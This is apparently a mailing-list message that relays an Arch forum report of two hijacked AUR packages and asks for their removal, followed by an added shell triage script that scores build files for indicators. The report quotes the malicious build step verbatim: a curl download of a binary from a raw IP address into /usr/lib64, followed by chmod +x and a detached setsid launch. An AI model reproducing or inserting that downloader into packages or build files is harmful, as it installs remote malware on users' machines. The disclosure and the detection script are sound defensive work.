Hi,
On 10/29/25 10:43, GlassTree wrote:
Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179
-----
I've noticed these two packages being "hijacked": mdbtools and materia-theme-git
Both under the same user "koolpp"
The new versions uploaded refer to a shell script available at a Codeberg
repository:
https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am
https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson.build
I reported this to the Codeberg moderation team earlier and the repos have
been taken down now as well!
The scripts execute the following:
```sh
#!/bin/sh
mkdir -p /usr/lib64
curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
chmod +x /usr/lib64/libkwrk.so.1.5.3
setsid /usr/lib64/libkwrk.so.1.5.3 &
```
Looks like a remote file will create a background session with execute
permissions if you install these packages.
May these new package versions be taken down.
Marcus
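
A triage check built from the indicators quoted in the message above, as an added example that is not part of the original message or the forum post. The function names and the ROOT argument are assumptions made for this example; the path and IP address are the ones in the quoted script.

```shell
#!/bin/sh
# Added triage example; indicators come from the script quoted in the message.
# Function names and the ROOT argument are assumptions made for this example.
IOC_PATH="/usr/lib64/libkwrk.so.1.5.3"
IOC_HOST="45.94.31.147"

# check_dropped_file ROOT: exit 0 if the dropped file exists under ROOT.
# ROOT is "/" for the live system, or a mounted disk image or chroot.
check_dropped_file() {
    [ -e "${1%/}$IOC_PATH" ]
}

# score_build_file FILE: print how many behaviours of the quoted script
# (0 to 5) appear in FILE, e.g. a PKGBUILD, Makefile.am or meson.build.
score_build_file() {
    file=$1
    score=0
    # 1. URL whose host is a bare IPv4 address
    if grep -Eq 'https?://[0-9]{1,3}(\.[0-9]{1,3}){3}' "$file"; then
        score=$((score + 1)); fi
    # 2. curl or wget saving the download to a file
    if grep -Eq '(curl[^|;&]* -o |wget[^|;&]* -O )' "$file"; then
        score=$((score + 1)); fi
    # 3. chmod adding an execute bit (symbolic or octal mode)
    if grep -Eq 'chmod[[:space:]]+([ugoa]*\+[rw]*x|[0-7]*[1357])' "$file"; then
        score=$((score + 1)); fi
    # 4. detaching a process from the build (setsid, nohup, disown)
    if grep -Eq '(^|[^[:alnum:]_])(setsid|nohup|disown)([^[:alnum:]_]|$)' "$file"; then
        score=$((score + 1)); fi
    # 5. the exact host or file path reported in this thread
    if grep -Fq -e "$IOC_HOST" -e "$IOC_PATH" "$file"; then
        score=$((score + 1)); fi
    echo "$score"
}

# Stand-alone use: sh triage.sh FILE...  (prints "score<TAB>file")
for f in "$@"; do
    printf '%s\t%s\n' "$(score_build_file "$f")" "$f"
done
if check_dropped_file /; then
    echo "WARNING: $IOC_PATH is present on this system"
fi
```

A score of 0 does not clear a build file; the first four patterns only catch this particular download-and-run shape.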